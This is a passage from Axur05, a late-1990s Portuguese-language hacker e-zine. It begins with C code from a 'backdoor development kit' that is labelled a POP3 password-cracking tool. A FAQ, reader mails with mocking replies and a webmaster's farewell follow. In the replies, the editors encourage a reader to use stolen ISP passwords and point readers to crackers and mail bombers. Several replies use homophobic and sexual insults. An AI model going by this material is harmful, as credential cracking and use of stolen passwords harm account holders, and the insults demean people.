funcional)). Como dito anteriormente, eh um projeto, estah atualmente na versao 0.3b(provavelmente estara na versao 0.31b quando posto na page da axur05). Para exemplificar aki vai um exemplo de como eh facil fazer um programa usando as libs do remote backdoor dev kit. --------------8<----- cut here ------8<------8<------------------- /* Remote BackDoor Development kit v0.3beta POP v.1.2 ------------------------- (c)1997, csh@sekurity.org */ #include "bdkit.h" main( argc, argv) int argc; char **argv; { int soc, siz; char tmp[1024]; printf("TCP/POP brute force cracking v1.2 from "BDKIT_VERSION); if (argc<4) { printf("%s: \n", argv[0]); exit( 1); } soc = do_conexion( argv[1], 110); /* conecta na pop */ /* dump string */ do { siz = read( soc, tmp, 1024); tmp[siz]=0; printf("[%d]%s", siz, tmp); } while (incoming_char(soc, 0)>0); /* manda username */ sprintf( tmp, "USER %s%c", argv[2],13); soc_writeln( soc, tmp); do { siz = read( soc, tmp, 1024); tmp[siz]=0; printf("[%d]%s", siz, tmp); } while (incoming_char(soc, 0)>0); /* manda password */ sprintf( tmp, "PASS %s%c", argv[3],13); soc_writeln( soc, tmp); /* dump string */ do { siz = read( soc, tmp, 1024); tmp[siz]=0; printf("[%d]%s", siz, tmp); } while (incoming_char(soc, 0)>0); close(soc); } pra compilar.. cc -o pop pop.c -DSTREAMING -Ilib lib\bdkit.c ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 20:> Axur05 FAQ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by VooDoo ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Recebemos todos os dias centenas de e-mails com perguntas de usuarios querendo tirar duvidas e/ou resolver problemas. Como o numero de msgs eh realmente muito grande raramente damos um reply em todas elas. Bom, algumas mensagens sao tao parecidas que se fosse gerado um reply automatico o esquema funcinaria perfeitamente bem. Por causa disso resolvemos criar esta pequena FAQ com as perguntas mais frequentes que sao enviadas a nos. Esperamos que seja util (porque pra nos com certeza eh ;) [01] Gostaria de mais informacoes sobre voces e a Axur05. Somos um grupo de amigos aparentementes tao normais quanto voce que esta lendo isso aqui agora. Resolvemos nos reunir e escrever uma revista eletronica (Axur05) contendo assuntos tecnicos relacionados a computadores e seguranca em geral. Ao contrario do que muitos pensam, nao somos hackers e nao estamos nem ai pra nenhum tipo de rotulo que certas pessoas jogam em outras. Simplesmente gostamos de uma parte da informatica muito pouco difundida. Para nos, computadores representam um desafio e nao um simples "instrumento de trabalho" monotono que eh usado para executar tarefas dia apos dia da mesma maneira. Mais infor- macoes sobre o pessoal que escreve a revista pode ser obtida escreven- do para os mesmos. [02] Quero ser membro. Onde posso preencher o cadastro? Nao existe cadastro. Se quisessemos reunir um batalhao de usuarios de Internet colocariamos na nossa pagina uma banner com um aviso de que as inscricoes estariam abertas. Garanto que em 10 dias teriamos mais de 5 mil pessoas interessadas. Porem, tb posso garantir que 90% do pes- soal gostaria de ser membro nao para trocar informacoes com pessoas de mesmo interesse, e sim para ficar sentado em casa, tomando seu cafezi- nho, vendo MTV com sua placa de TV e apenas recebendo informacoes. E o esquema nao eh assim. Todos os membros atuais se conhecem, trocam in- formacoes e contribuem de alguma forma para o crescimento e divulgacao da revista. [03] Eu quero contribuir tambem. Como faco? Apenas entre em contato conosco. Se o que voce tiver for alguma coisa realmente boa, inovadora, original e voce deseja mostrar isso ao mundo nos teremos prazer em publicar em alguma edicao da revista. Tambem se voce tiver em mente um bom projeto e nao tem onde hospedar/divulgar o mesmo, nos podemos ceder o espaco necessario em nosso servidor. Apenas escreva para algum de nos relatando detalhadamente o que voce planeja. P.S: Nao somos o geocities que da chance de losers estupidos hospedarem suas fotos de criancas fazendo sexo. Portanto, nao venha pedir espaco para a pagina pessoal do seu cachorro que nos vamos te ignorar. [04] Quem sao os membros atuais do grupo? Atualmente estamos com a seguinte configuracao... ;) [ AciDmuD ] [ csh ] [ Axcel ] [ VooDoo ] [05] Voces tem BBS ou um Site FTP com conta "anonymous"? Sim e nao! Alguns de nos rodamos boards privadas acessiveis apenas por quem a gente escolhe pelo simples motivo de que nao queremos ninguem fazendo besteira nos nossos sistemas. FTP anonimo foi desabilitado por "security purposes" :) Porem, todos os arquivos localizados em nosso FTP (fora aqueles das areas privadas e members only) estao disponiveis em nosso site. [07] O que eh a area "members only" que tem no site? Como ter acesso? Esta area eh exatamente o que do nome diz: "Members ONLY". Para ter acesso a essa area eh muito simples: eh soh ter um login e uma senha. Para ter um login e uma senha eh necessario ser membro. ;) Pedimos que nao nos enviem mensagens perguntando o que tem nessa area ou se a gente libera um login apenas para voce "olhar". Mensagens desse tipo serao ignoradas. [09] Voce poderia me enviar o arquivo "tal" que nao esta no site? Nao, nao podemos e nao vamos enviar nada. Nao somos entregadores e nossos e-mails nao funcionam como um FTPmail. O que podemos fazer eh buscar o programa/arquivo e disponibilizar o mesmo para todos lah no site. [10] Voces poderiam me enviar algumas senhas do provedor "XXXXXXX"? Nao! Sinceramente, isso eh coisa de vadio. Ao inves de ficar mandando mensagens como esta o individuo poderia ler algumas coisas sobre seguranca e tentar invadir o provedor XXXXXXX sem a ajuda de ninguem. Ou seja... o envio de mensagens como esta eh perda de tempo total. [11] Porque voces me ignoram e nao respondem meus mails? Talvez a sua mensagem nao mereca uma resposta. ;) Nao respondemos a todas as mensagens simplesmente porque nao estamos 24 horas disponiveis para ficar ajudando outros usuarios. Jah recebi ate mails de pessoas pedindo o procedimento para fazer a limpeza de um mouse. Quando recebemos coisas como essas pensamos logo: "e assistencia" tecnica serve pra que???" [12] Voces nao vao traduzir os textos em ingles que estao no site? Claro que nao! Nao somos grupo de traducao pra fazer coisas como essa. Existem varios grupos de traducao que fizeram trabalhos excelentes traduzindo textos e manuais de linux/unix. Procure um deles! [13] Me ensina a usar o cracker jack? Nao! ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 21:> Rooxing mails !! ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by VooDoo ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù From: data@xs4all.nl Subject: Send mail: Woooooow !!! Although I cannot read the most of your pages, I have to say I am absolutely amazed by the beauty of all this, I have seen many, many pages, but this one is the best one I have EVER seen !!! Are you planning an English section ??? (I think Dutch would be too strange ... Great work! Cara da xs4all areas da Holanda, um dos maiores do mundo, tipo do neguinho que nao se acha! Faz a sua parte bem feita e fica na sua ;) Ingles? Logo, logo... From: "???????" Subject: Hi hackers !!! Hi ! My name is Andrew Runov. I'm from Lithuania. I am just beginner in hacking. I know just basic...and don't laugh !!! I know a little Html code Please send me this interesting Html language. I want to be a hacker... Please be my teacher...bye now...oh my nickname is Mad Dron ( call me Mad Dron. I don't)... Lituania??? Jah estamos lah tb! Bom... jah respondemos diretamente para o famoso Mad Dron! :) From: ???????? Subject: provedores FDPs E aih galera... vcs saum realmente d+... queria pedir um favor... Derrubem um provedor FDP daki de Dourados MS q fica nukando a galera... valeu. O provedor e' a menthor internet Valeu por tudo, desde as revistas editadas ate entao... Mac †he Sadness Provedor nukando os usuarios? Hummm, meio dificil! Mas nao dah nada. Nao conhecemos esse provedor, nao temos nada contra ele e nao fazemos coisas como essa simplesmente porque alguem implicou com um provedor que dah acesso internet (bom ou ruim... nao sei!) a centenas ou ate milhares de pessoas. Falow! From: ???????? Subject: (no subject) Ei cara me da uma ajuda ai sobre o netforward como devo configurar meu emailer para ele! isso se nao for pedir muito! E' pedir muito sim! From: ???????? Subject: (no subject) A Revista Axur05 e' indiscutivelmente fantastica, aproveito para falar que no Recife, todas as dicas sobre celulares estao funcionando perfeitamente. Nao sou hacker, mas sou um colecionador de suas historias e material, programo a pouco tempo em pascal e me amarrei principalmente no material da equipe de vc's.. Parabens!! Valeu! E' bom saber que os esquemas estao funcionando! From: ????? Subject: Axur05 O Axur05 e' demais , eu tenho ate' o numero 02 , tem mais alguma edicao ? Se possivel , me mande o telefone de alguma BBS underground brasileira onde eu possa achar o Axur05 . Um abraco Tks! No momento estamos neste numero (03). Nem faco ideia das BBS que estao distribuindo o zine, mas quem desejar fazer isso esta' totalmente liberado. From: ??????? ???? Subject: Hack Caro Axur05 (me desculpe, mas nao sei seu nick) Estou precisando de uma dica: Consegui a senha de diversos provedores, mas, nao sei como faço para usa-la a nao ser por ligacao direta ao provedor, coisa que sairia caro para mim no final do mes, pois estes sao todos fora de minha cidade. Caso vc possa me ajudar, ficarei muito grato. Obs.: outra coisa, estou precisando do CrackerJack for DOS, caso saiba onde tem, me avise. Hummmmm... Voce nao conhece telnet, FTP, E-mail e coisa e tal...? Existem 1001 possibilidades de utilizacao de uma senha. Teoricamente, voce pode fazer tudo o que faz com a sua senha (soh nao diga q voce usa ela apenas para acesso). O crackerJack esta' na area de crackers do site. From: ?????@HOTMAIL.COM Subject: Send mail: TO HELL TO HELL!!!!!!!!!!!!!! Thanks! :) From: ?????????? Subject: MEMBRO? Cara... gostaria de saber como posso me tornar membro da AXUR05!!?? please me diga ok!!! espero respostas ahhh? e sem mail bomb ok heheh!!! Pra que voce quer ser membro? Apenas para acessar as "coisas" que estao na area members only e receber informacoes ou para contribuir para o crescimento do zine? Caso a opcao seja a segunda mande uma foto (nao a sua... manda da sua irma), o numero do teu CC e 100 dolares em vale postal para o nosso endereco. =) Falando serio: pra ser membro o esquema e' outro... P.S: mail bomb e' coisa de moleke que nao tem nada pra fazer. From: ???????@NUTECNET.COM.BR Subject: ????? Eu uso o Internet Explorer 3.X e as paginas causam diversos erros de javascript: devo pegar o Netscape Communicator? Bom, as paginas foram programadas para serem visualizadas apenas no netscape Communicator. Com o IE (tambem chamado de Internet Exterminator por soh detonar o HD), as paginas podem causar diversos erros visto que o IE nao suporta 100% de javascript. From: ??????????@?????.com.br Subject: Report Error Essa Página Inteira é um Erro! tirem essa bosta do ar entrem em http://www.??????.com.br/?????? e aprendam um pouco! Uma pergunta: voce e' escravo? Ninguem obrigou voce a entrar em nosso site. Mas tudo bem, eu visitei a sua pagina e vi realmente uma pagina hacker. O layout e a aparencia estavam perfeitos: fundo preto com fonte marrom. Nada mais que cinco Java Applets e um numero indeterminado de gif's animadas. Mais paulada mesmo foram os textos: "gosto de hackear, jogar futebol, musica country..." Bahhh, que palhacada! Paginas como a sua so' entopem a Internet de lixo! Se eu soubesse o telefone da senhora sua mae eu ligava e pedia pra ela "tirar voce do ar". Mas nao quero dar mais esse desgosto pra veia... :) From: ?????????? Subject: Send mail: Axurers, so quero que voces saibam que eu EXISTO, e breve tomarao conhecimento disto pessoalmente (hehehe...voces verao) Brother, voces sao muito fodas e so tenho as 3 primeiras versoes da revista... Tal, eh isso ai entao, fiquem na moral.... (o hombre mais caliente da intermet) ps: UM BEIJO PARA TODOS... To de sacanagem, lhes peco para nao me levar a serio pois a EMOCAO eh incomensuravel) Aeee! Bom, agora todo mundo sabe que voce existe! Falow. Sem stress... From: ?????????@hotmail.com Subject: Algumas matérias, um elogio Realmente um site de padrao internacional e uma revista de fazer inveja pra' qualquer um em qualquer lugar. Acho que seria legal uma materia sobre como ler mensagens colocadas em private, quando se esta' dentro de um chat www, tipo UOL. Seria legal sacanear os mauricinhos que andam por estes lugares. Outra, uma sobre anonimato na WEB. Valeu. Valeu dwd! Quanto as suas sugestoes e' o seguinte: eu particularmente acho um lixo esses chat WWW. Esses lugares sao repugnantes! Sei que tem muito maluco que consegue derrubar o pessoal e fazer outros esquemas nesses CHATS. Quanto a outra sugestao, vamos pensar em algo nesse sentido. Mas, a sugestao esta aceita. Falow! From: ??????@prodigy.net Subject: Send mail: password What is the best program to crack xxx password? Intelligence ;) From: ????????@sec.secrel.com.br Subject: Anarquia Ta tudo muito bom, ta tudo muito legal, mas os "Anarchy" sao todos em ingles? Passa pra Portugues que fica mais COOl! Valeu e meus parabens por ter feito um trabalho tao bem feito.. Opz, nao somos um grupo de traducao pra ficar traduzindo o trabalho dos outros. Claro que portugues ficaria mais paulada mas.. sem stress ;) From: ??????@geocities.com Subject: Axur5 Bom pra comecar eu queria homenagea-los pela Home Page e pelo conteudo dela E em segundo eu sei que e' uma pergunta boba mais eu queria saber que programas vcs usam para fazer os graficos contido na axur5 Valeu pelos elogios. O simbolo principal foi feito por um maluco chamado DarkSoul e editado por mim epenas para trocar as cores e posicionar novamente as figuras. Os outros graficos sao feitos no Corel Draw, Photo Paint/Shop ou qualquer outro prog com uns filtros legais. From: ??????@hotmail.com Subject: Send mail: Dúvida Bom, eu sei que voces pediram para nao pedirmos nada, mas estou com um manual do anarquista aqui e a biblia do motorolla, nao sei se voces tem, por isso estou escrevendo, eu posso mandalos para voces, mas gostaria de saber se neste site existe o Kaboom e o Homicide, programas bomber. Por favor me escrevam. Nao, voce nao entendeu. Mensagens com duvidas interessantes e coisas do tipo sao muito bem vindas. Apenas colocamos aquilo para que o pessoal nao fique pedindo programa, dica estupidas, senhas e coisarada... Valeu mas temos esses dois arquivos sim e os bombers estarao em breve disponiveis. From: ???????@facil.com Subject: Send mail: Dúvida... Gostaria de saber se este site e sobre uma revista em papel ou se e somente virtual. Se for encontrada tb em papel, como faco para adquirila, caso ela nao chegue em minha cidade(como nao chega!!!) Interessante. Recebemos diversas mensagens desse tipo. :) Nao, a revista Axur05 e' uma revista eletronica gratuita e ao contrário da 2600, nao e' vendida em bancas e livrarias. From: fuck.you@lamefuckers.org Subject: Send mail: Fuck YoU! Hey idiotas! Falem serio... vcs dizem "Sem Mestres", mas se acham FODAS pq fazem uma revistinha de bosta, Vcs se acham fodas? Ate agora soh vi babozeira... se achando deuses... realmente, per toda maioria esmagadora de lamers no brasil, q acessam aquele irc-script-lamers #Brasil,vcs sao deuses... vcs e q um outro q tenha um minimo de CEREBRO...Pq nao param de se idolatrar? Vcs falaram dele, mas estao ficando IGUAL aquele idiota q escreve aquela Barata Eletrica... o cara diz ate q tem FA CLUBE... daqui a pouco vcs estao montando um fa clube pra vcs mesmos right? Francamente... se assim o quizerem, respondam na sua proxima revistinha q eu vejo... Bom, depois de corrigir os erros de digitacao de sua mensagem vamos a resposta. Se a nossa "revistinha" e' uma bosta porque voce nao salva o mundo e faz algo melhor? Nunca nos idolatramos ou nos achamos "deuses". Se voce acha que qualquer um outro que tenha um minimo de CEREBRO pode virar Deus voce com certeza nao se encontra na lista. E outra coisa: FA CLUBE????? Se o cara la tem um fa clube e' problema dele. O nosso talvez fique pronto quando voce aprender a limpar a bunda direito, ou seja, NUNCA! Nao temos culpa se voce nao tem capacidade pra escrever um bagulho decente e isso acabou gerando um complexo na sua podre, fetida e putrida mente. Agora faça um favor para metade da populacao mundial: desapareca! ;) From: ???????@bsi.com.br Subject: Mais que LIXO ! VAI SE FUDE !!! EU ENTEI NESSA PORRA DE ENDEREÇO E DEMOROU 2 ANOS E MEIO PRA CARREGAR !!!!!!!!! ODEIO ENDERESO ASSIM QUE NÃO PRESTA... NUNCA MAIS ENTRO NESSA MERDA! OK! Agradecemos se voce nao entrar mais em nossa pagina. Imagine se enquanto voce esta visitando nossa pagina acontece um ataque de dor no utero ou algo como uma corrosao dos ovarios em virtude do sexo bizarro com equinos que voce pratica. Se voce morrer o Ibama pode nos processar... Sem stress... ;) From: ????????@AOL.COM Subject: Send mail: NESTSCAPE? SEI QUE PARECE UMA PERGUNTA BOBA MAS: PORQUE O NESTCAPE + MELHOR QUE O EXPLORER QUAL A VANTAGEM? Vantagem? Posso citar algumas... 1) O Internet Explorer nao tem suporte total a JavaScript. 2) De cada 5 Bugs encontrados no IE sao encontrados 1 no Netscape e este e' 100 vezes menos "drastico" do que os bugs do IE. 3) Ate' quando voce acha que o IE vai ser gratuito? 4) Microsoft (apesar de fazer uns progs legais) é suja e monopolista! SALVE NETSCAPE ;) From: ????????@hotmail.com Subject: obter permissao criei uma hp ( http://www.geocities.com/Hollywood/Set/?????/?????.htm ) eu queria saber se posso distribuir e divulgar o zine na minha pagina e incluir na parte de link sua hp reply p/ mim poder acabar a page OK Na boa! Pode meter os zines e o link na sua pagina. So pedimos que nao coloquem links que levem ao download direto de nossos arquivos. O melhor a fazer e transferir os arquivos que voce quer distribuir para o seu espaco em disco. From: ???????@tecnet.com.br Subject: Send mail: Resposta Gostaria de saber como eu descubro as senhas dos usuarios de meu servidor!!! Envie para mim como fazer isso o mais rapido possivel! Thanks. Ha duas maneiras de fazer isso: tente pedir para cada um deles as respectivas senhas. Se tiver tempo peca o login tambem, assim voce nao gasta tempo tentando descobrir. A outra maneira e um pouco mais facil: pegue o login de um usuario e transforme tudo em numeros de acordo com a posicao de cada caracter na tabela ASCII. Logo apos multiplique o numero encontrado por 1758490,33 (importante: nao pode ser feito na calculadora). Depois disso pegue o resultado e aplique a raiz quadrada. Se o resultado nao for um numero inteiro subtraia 100 da terca parte do que voce encontrou anteriormente e some com o antigo resultado. Transforme o numero em um numero inteiro e aplique baskara tomando o primeiro valor como "a", a metade de "a" sendo "b" e a metade de "b mais a metade de "a" mais duas vezes "b" sendo "c". Retire 20% do valor de cada raiz encontrada e some as duas. Despois disso multiplique o resultado pelo dobro da velocidade do seu computador em milhas por hora e divida pelo numero de setores defeituosos no HD de cada usuario. Depois e' so' transformar o valor em caracteres de acordo com a tabela ASCII (sempre de 96 a 122). Vai tentando por esse metodo e caso nao de certo: sem stress, nao desista... Eh cada um q so vendo mesmo. =) From: ??????????@domain.com.br Subject: Send mail: Valeu!!! O Zine e o MELHOR que ja pude ler, assim sendo os que falam mal dele e pq nao conseguem fazer uma obra de tao alto valor para a familia Hacker. Continuem assim e quando precisarem de alguma ajuda, estou a disposicao. Valeu! Tenho a mesma opiniao. O maluco pode ate nao gostar e achar uma coisa inutil (qualquer um tem esse direito) mas os que falam mal e se acham os maiores so porque ficam mandando bombZ e flames e por que nao conseguem fazer algo melhor. Falow... From: ?????????????@br.homesshopping.com.br Subject: Virus Verifique os arquivos de download do Novell, meu antivirus Pc-cillin detectou virus no arquivo getit.com. Valeu pelo aviso mas quem tem que ficar ligado sobre estes esquemas de virus e' quem faz o download dos progs (nao apenas de nosso site mas de qualquer um). Portanto esta dado o aviso. From: ?????????@vitoria.com.br Subject: Send mail: Warez?!?! Pq naum fazem uma parte Warez tipo Microcrap, ao inves de tirarem ela do ar? Ficaria muito legal e vcs naum teriam responsabilidade sobre os links colocados ali. Nossa intenção era fazer uma página warez apenas com links para páginas ou FTP abarrotados de progs (apenas programas, games eh foda). Mas antes mesmo da página entrar no ar já começou a dar problema e, para evitar maiores confusões, abandonamos o projeto. From: ?????????@???????.com.br Subject: Report Error Nao eh um erro, e sim uma desconsideracao com usuarios linux/unix Voce deixou a revista em formato ZIP, e nao eh todo mundo que tem o winzip para unix/linux, logo, nao posso abrir a revista. Sugiro que vc utilize alem de zip, uma compactacao tar, gz, ou outra que o unix possa abrir facilmente. Muito Obrigado Claro, nao e' todo mundo que tem winzip pra unix/linux. (Olha o nome, WINzip... ta' ligado :)). Mas diria que 99% de usuarios de linux/unix tem zip e unzip (o 1% é formado por usuários que ainda nao conseguiram instalar o sistema). Logo, qualquer usuario destes sitemas pode abrir a revista. :) From: youdonneedtoknow@nowhere.com Subject: Report Error I don't understand this language!!!!! Ta e dai? Te fode! ;) From: ????????@techno.com.br Subject: Send mail: Script Mas bem q vcs poderiam fazer o AXUR SCRIPT... C quiserem ajuda estamos aqui. ahhh, e desulpa a pressa.... qquer coisa me procure na brasirc. #????? com o nick de \???????\, valeu e t+ AXUR Script???? Meu, tu bebeu? :) From: ???????@thor.intercafe.com.pl Subject: i want voodoo fuck you Opz, Thanks! From: O Elefante Subject: Mais memoria de Elefante para voce! Prezado Usuario, O Elefante esta` radiante de alegria, pois tem tres importantes novidades para dividir com voce. A primeira novidade e` que, atendendo a muitos pedidos, estamos expandindo a capacidade de nosso paquiderme de 50 para 75 datas por pessoa. Isso quer dizer que agora voce tem 50% a mais de ~memoria de Elefante~ para usar e abusar! Outra grande noticia e` que ja contabilizamos mais de 1.200 inscritos em nossa super-promocao ~Va` a Africa de graca com o Elefante~. Voce, que ainda nao se inscreveu, ainda tem tempo - as inscricoes se encerram no dia 31 de janeiro! Para terminar, o mais importante? ~O Elefante~ foi classificado como finalista no concurso ~Internet World Best 97~, na categoria ~Servico on LineComercio Eletronico~. Agora, na reta final, precisamos da ajuda de todos para um empurraozinho que classifique novamente nosso amado Paquiderme! Nao deixe de votar em nos no endereco . Contamos com sua ajuda! E mais novidades estao a caminho! Estamos fazendo de tudo para lhe oferecer o melhor servico da Internet. Um abraco bem apertado do... O Elefante e sua manada Hahahaha! Eh foda! Os caras inscrevem meu endereco em cada esquema que soh vendo mesmo. Agora esse do elefante foi triste! ;) From: ??????????@nutecnet.com.br Subject: Vamos ficar amigos? EU SOU GAY EDAI... o que voces tem contra gays? Posso meter um processo no rabo de voces seus merdas. Nao temos nada contra gays (ate' porque a cada novo casal de gays sobram duas mulheres a mais no mundo...) Quanto ao processo pode mandar (soh o negocio de levar no rabo a gente deixa pra ti que gosta dessas coisas). :)) From: ???????@????com.com Subject: Send mail: Eu sou o melhor do mundo Eu sou o melhor hacker do mundo. Eu desafio qualquer um para um desafio de hackeagem. Eu tb sou um otimo cracker, ja destrui muitas hp, com por exemplo a da disney. Se alguem tiver alguma duvida duvida disso, e so passar um e-mail para mim. Meu e-mail e ???????@????com.com Tome cuidado para nao ter a sua hp destruida pelo super ?????? Tao pensando que isso e' o que? Os caras mandam essas merdas com o nome de um amigo soh pra queimar com o cara. Coisa de gente sem imaginacao... From: ??????@capecod.net Subject: Report Error EVERYTHING IS IN SPANISH!!!!!!!!!!!!!! SPANISH?????? Spanish o KCT ;) From: Black Wizard Subject: ACC Hi, I`m from Bulgaria ?)) Please send acc for AXUR05.org :)) Hummm, Bulgaria! OK! :) ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 22:> Novo Webmaster ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by VooDoo ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Bom, depois de quase dois anos participando ativamente das atividades da axur05, eu me despeco de todos. Infelizmente, devido a diversos fatores, nao tenho mais tempo de escrever e cuidar do dominio. Como todos puderam constatar, o dominio foi fechado por tempo indeterminado e permanecera assim ate encontrarmos um webmaster que cuide do mesmo. Jah temos dois interessados: NyoNyx & van-k00s. Soh falta mesmo decidir entre um deles, porem, tenho certeza que qualquer um dos dois vai fazer um bom trabalho. Provavelmente as paginas nao seguirao o mesmo estilo (cada webmaster tem uma maneira propria de trabalhar). Talvez as paginas fiquem mais simples, sem muitos graficos, porem, tenho certeza de a qualidade de informacoes sera bastante melhorada. Meus enderecos de e-mail vao ser desativados. Portanto eh inutil enviar msg para voodoo@deathsdoor.com, meu endereco pessoal ou - webmaster@axur05.org (obviamente este sera o endereco do novo webmaster) Para entrar em contato comigo soh via BBS (se me acharem). Por fim, esperamos que as duas malas decidam o mais rapido possivel quem vai assumir o cargo de webmaster e coloquem o dominio no ar novamente. Ate lah... sem stress... ;) A todos que me ofenderam: obrigado! A todos que me cadastraram em listas para GAYS, nazistas, lesbicas, ou coisas do genero: obrigado! A todos que me enviavam 5000 mail bombs por dia: obrigado! A todos que ligaram para minha casa ofendendo e mim e minha familia: o- brigado! A todos que fizeram ameacas de me bater, matar, espancar... Obrigado! Todos voces me fizeram rir e ver realmente que a Internet eh cheia de pessoas estupidas e ignorantes. E, para terminar... A todos que apoiaram o meu simples trabalho como webmaster: MUITO obrigado! ßÛßßÜ ÜßÜ ßÛ ÜÜ ßÜ ßÛßßÜ ÜßßßÜ ÛßßßßßÜ Û Û ßÜ Üß Û Û Û Û Û Û ÛÜÜÜ ßÛßßßÛ Û Û Û ßÛßÛß Û Û ß ßÜ Û Û Üß Û Û Û Û ßÜ ÛÜ Û Û Üß Üß ßß ßß ÜßÜÜÜÜÜß ß ß ßßßß Ü Üß ßßßß ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º - > . < - GLOBAL DOMINATION INC - > . < - º ÈÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍͼ º AciDmuD ... . acidmud@axur05.org º " It is easy to run a secure º csh ... . csh@axur05.org º computer system. You merely º VooDoo ... . webmaster@axur05.org º have to disconnect all dial- º º up connections and permit º Official Site º only direct-wired terminals º www.axur05.org º put the machine and its ter- º º minals in a shielded room, º "EX AUDITIS ET VISIS" º and post a guard at front º º door." ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ